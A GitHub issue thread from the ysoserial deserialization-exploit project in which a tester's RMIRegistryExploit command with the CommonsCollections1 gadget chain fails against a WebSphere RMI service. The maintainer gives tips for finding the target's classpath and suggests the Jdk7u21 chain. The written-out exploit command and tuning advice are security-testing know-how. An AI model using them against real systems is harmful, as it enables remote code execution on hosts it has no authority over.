Skip to content
New issue

Have a question about this project? Sign up for a free GitHub account to open an issue and contact its maintainers and the community.

Sign up for GitHub

By clicking “Sign up for GitHub”, you agree to our terms of service and privacy statement. We’ll occasionally send you account related emails.

Already on GitHub? Sign in to your account

Jump to bottom

No security manager: RMI class loader disabled #40

Closed
BobPeterson opened this issue Apr 18, 2016 · 4 comments
Closed

No security manager: RMI class loader disabled #40

BobPeterson opened this issue Apr 18, 2016 · 4 comments

Comments

@BobPeterson
Copy link

First of all, thanks for your work, it's awesome.

I'm testing an host who use the RMI protocol on port 22099. I could connect to it using the "jconsole" tool. However using ysoserial, I have the following stacktrace.

  • Command:

java -cp ysoserial-0.0.4-all.jar ysoserial.exploit.RMIRegistryExploit <ip> 22099 CommonsCollections1 "/sbin/ifconfig"

I have tried many different payloads to be sure and different CommonsCollections but the problem is still present.

  • Stracktrace:
java.rmi.ServerException: RemoteException occurred in server thread; nested exception is: 
    java.rmi.UnmarshalException: error unmarshalling arguments; nested exception is: 
    java.lang.ClassNotFoundException: org.apache.commons.collections.map.LazyMap (no security manager: RMI class loader disabled)
    at sun.rmi.server.UnicastServerRef.oldDispatch(UnicastServerRef.java:400)
    at sun.rmi.server.UnicastServerRef.dispatch(UnicastServerRef.java:255)
    at sun.rmi.transport.Transport$1.run(Transport.java:168)
    at java.security.AccessController.doPrivileged(AccessController.java:279)
    at sun.rmi.transport.Transport.serviceCall(Transport.java:164)
    at sun.rmi.transport.tcp.TCPTransport.handleMessages(TCPTransport.java:506)
    at sun.rmi.transport.tcp.TCPTransport$ConnectionHandler.handleRequest(TCPTransport.java:838)
    at sun.rmi.transport.tcp.TCPTransport$ConnectionHandler.run(TCPTransport.java:912)
    at java.lang.Thread.run(Thread.java:810)
        .......

The application server installed on the remote host is a Websphere. The RMI protocol uses serialized data, so I think it has to be vulnerable to apache commons vulnerabilities.

Thanks for your help, I will have access to this host until thursday.
@frohoff
Copy link
Owner

frohoff commented Apr 18, 2016
edited
Loading

It sounds like the classes required by the CommonsCollection1 chain (or others) are probably not on the classpath in this case.

A decent way to investigate, assuming you have console access on this host, is to get the full classpath of that JVM/process: figure out which process is listening on that port (i.e. netstat -nlp | grep 22099), then check the full command line for -cp -classpath params (i.e. ps aux | grep $pid), and if necessary, see what files the process has open (i.e. lsof -p $pid | grep jar).

Unfortunately the above will only tell you what the entire collective process has loaded, and not what the specific child ClassLoader in question has loaded, which can be different. RMI Registries generally inherit the ClassLoader of the code that creates them with a call to LocateRegistry.html.createRegistry(int).

Do you know what Java version is being used? Have you tried the Jdk7u21 chain?

In the future I'd suggest asking questions like this in the Gitter chat. I'll probably close this shortly.

-Chris

@frohoff
Copy link
Owner

frohoff commented Apr 19, 2016

Closing. Please follow-up in the GItter chat if there are further questions.

@frohoff frohoff closed this as completed Apr 19, 2016
@sevck
Copy link

sevck commented Nov 14, 2017

I have also encountered this problem, want to know how to solve upstairs

@sevck
Copy link

sevck commented Nov 15, 2017

7u21

Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment
Assignees
No one assigned
Labels
None yet
Projects
None yet
Milestone
No milestone
Development

No branches or pull requests
3 participants
@frohoff @sevck @BobPeterson